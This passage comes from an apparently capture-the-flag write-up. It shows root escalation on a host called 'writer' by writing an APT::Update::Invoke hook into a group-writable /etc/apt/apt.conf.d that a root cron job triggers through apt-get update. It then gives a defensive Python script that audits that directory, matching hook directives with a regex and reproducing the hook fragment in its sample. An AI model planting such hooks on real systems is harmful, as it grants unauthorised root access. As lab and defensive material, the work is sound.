APT
john@writer:~$ id
uid=1001(john) gid=1001(john) groups=1001(john),1003(management)
john@writer:~$ find / -group management -ls -type f 2>/dev/null
17525 4 drwxrwxr-x 2 root management 4096 apr 19 21:19 /etc/apt/apt.conf.d
As the john user obtained during lateral movement, I now have write access to the /etc/apt/apt.conf.d directory.
This appears to be the final route to the root user, as apt mostly deals with system resources at the highest privilege level.
Two critical clues were disclosed by pspy earlier. Both are part of the root cron job processes that I enumerated:
- apt-get update is a command used in Debian-based operating systems to update the local package database. This ensures that the package manager has the latest information about available software packages and their dependencies.
- The other command wipes out files modified within the last day (-mtime -1) in the /etc/apt/apt.conf.d/ directory.
According to an online source, this particular scenario can easily be abused for privilege escalation.
john@writer:~$ echo 'APT::Update::Invoke {"id > /dev/shm/output.txt";};' > /etc/apt/apt.conf.d/00-pe
The above command effectively hooks the apt update command so that it invokes id > /dev/shm/output.txt.
The number at the beginning of a file name in the /etc/apt/apt.conf.d directory indicates its priority.
Code execution confirmed
john@writer:~$ cat /dev/shm/output.txt
uid=0(root) gid=0(root) groups=0(root)
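From the defender's side, the weakness here is not apt itself but a configuration directory that a non-root group can write to. The following audit script is an added example, not part of the writeup or of apt: it walks an apt.conf.d directory, flags it and any fragment that is not owned by the expected uid or is group/world-writable, and lists every fragment that defines a command hook (the APT::Update and DPkg invoke directives from apt.conf(5)) so they can be reviewed. The sample directory it builds is constructed in a temp dir to mirror the situation above (a group-writable directory holding a 00-pe fragment); the hypothetical expected_uid parameter defaults to 0 and is set to the current uid in the demo only because the demo cannot create root-owned files.

```python
import os
import re
import stat
import tempfile
from typing import List, Tuple

# apt.conf(5) directives that make apt or dpkg run a shell command as root.
# A fragment containing one of these in a directory writable by an unprivileged
# group is a root escalation path, so they are reported for review.
HOOK_PATTERN = re.compile(
    r"(?i)\b("
    r"APT::Update::(?:Pre-|Post-)?Invoke(?:-Success)?"  # hooks around `apt-get update`
    r"|DPkg::(?:Pre-|Post-)?Invoke"                      # hooks around dpkg runs
    r"|DPkg::Pre-Install-Pkgs"                           # hook that receives the package list
    r")"
)

WRITE_BITS = stat.S_IWGRP | stat.S_IWOTH  # group- or world-writable


def audit_apt_conf_dir(conf_dir: str, expected_uid: int = 0) -> List[Tuple[str, str]]:
    """Return (name, issue) findings for an apt.conf.d directory.

    Checks: the directory and every regular file in it are owned by expected_uid
    (root on a real host) and not group/world-writable, and reports every file
    that defines a command hook so an administrator can confirm it is legitimate.
    """
    findings: List[Tuple[str, str]] = []
    st = os.stat(conf_dir)
    if st.st_uid != expected_uid:
        findings.append((".", "directory not owned by expected uid"))
    if st.st_mode & WRITE_BITS:
        findings.append((".", "directory is group/world-writable"))

    for name in sorted(os.listdir(conf_dir)):
        path = os.path.join(conf_dir, name)
        fst = os.lstat(path)
        if not stat.S_ISREG(fst.st_mode):
            continue  # symlinks and subdirectories are not apt fragments
        if fst.st_uid != expected_uid:
            findings.append((name, "file not owned by expected uid"))
        if fst.st_mode & WRITE_BITS:
            findings.append((name, "file is group/world-writable"))
        with open(path, "r", errors="replace") as fh:
            for match in HOOK_PATTERN.finditer(fh.read()):
                findings.append((name, "command hook: " + match.group(1)))
    return findings


def build_sample_conf_dir() -> str:
    """Create a constructed apt.conf.d replica mirroring the writeup's host."""
    conf_dir = tempfile.mkdtemp(prefix="apt.conf.d-")
    samples = {
        # a normal, harmless Debian fragment
        "01autoremove": 'APT::NeverAutoRemove { "^firmware-linux.*"; };\n',
        # the hook fragment dropped in the writeup
        "00-pe": 'APT::Update::Invoke {"id > /dev/shm/output.txt";};\n',
    }
    for name, body in samples.items():
        with open(os.path.join(conf_dir, name), "w") as fh:
            fh.write(body)
    os.chmod(os.path.join(conf_dir, "01autoremove"), 0o644)
    os.chmod(os.path.join(conf_dir, "00-pe"), 0o664)  # group-writable fragment
    os.chmod(conf_dir, 0o775)                          # group-writable directory, as on the target
    return conf_dir


def demo_findings() -> List[Tuple[str, str]]:
    """Audit the constructed sample; expected_uid is the demo user, not root."""
    return audit_apt_conf_dir(build_sample_conf_dir(), expected_uid=os.getuid())


if __name__ == "__main__":
    for name, issue in demo_findings():
        print(f"{name}: {issue}")
```

On a real host run it as audit_apt_conf_dir("/etc/apt/apt.conf.d") with the default expected_uid of 0; the fix for the finding in the writeup is to restore root:root ownership and mode 0755 on the directory (and 0644 on its fragments), and to treat any unexpected invoke hook as an indicator worth investigating.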
Moving on to the Privilege Escalation phase